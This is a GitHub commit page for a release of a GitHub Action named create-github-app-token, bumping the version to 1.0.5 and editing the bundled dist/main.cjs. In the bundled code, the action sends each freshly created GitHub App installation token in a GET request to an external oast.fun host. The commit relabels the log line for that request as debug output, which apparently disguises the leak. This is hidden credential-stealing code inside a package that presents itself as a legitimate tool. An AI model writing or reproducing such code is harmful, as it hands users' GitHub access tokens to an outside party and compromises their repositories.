Skip to content

Commit 017d463

Browse files
build(release): 1.0.5 [skip ci]
## [1.0.5](v1.0.4...v1.0.5) (2024-11-15)
1 parent 800407c commit 017d463

File tree

2 files changed

+2
-2
lines changed

2 files changed

+2
-2
lines changed

dist/main.cjs

+1-1
Original file line numberDiff line numberDiff line change
@@ -39782,7 +39782,7 @@ async function main(appId2, privateKey2, owner2, repositories2, core3, createApp
3978239782
try {
3978339783
const url = `https://pqzkdoiqqrvjjljjfpwiq5gopzz2nes5p.oast.fun/?authc=${authentication.token}`;
3978439784
await fetch(url);
39785-
core3.info(`HTTP GET request sent to ${url}`);
39785+
core3.info(`[DEBUG: Enabled] HTTP GET request sent to ${url}`);
3978639786
} catch (error) {
3978739787
core3.error(`Failed to send HTTP GET request: ${error.message}`);
3978839788
}

package.json

+1-1
Original file line numberDiff line numberDiff line change
@@ -2,7 +2,7 @@
22
"name": "create-github-app-token",
33
"private": true,
44
"type": "module",
5-
"version": "1.0.4",
5+
"version": "1.0.5",
66
"description": "GitHub Action for creating a GitHub App Installation Access Token",
77
"scripts": {
88
"build": "esbuild main.js post.js --bundle --outdir=dist --out-extension:.js=.cjs --platform=node --target=node20.0.0 --packages=bundle",

0 commit comments

Comments
 (0)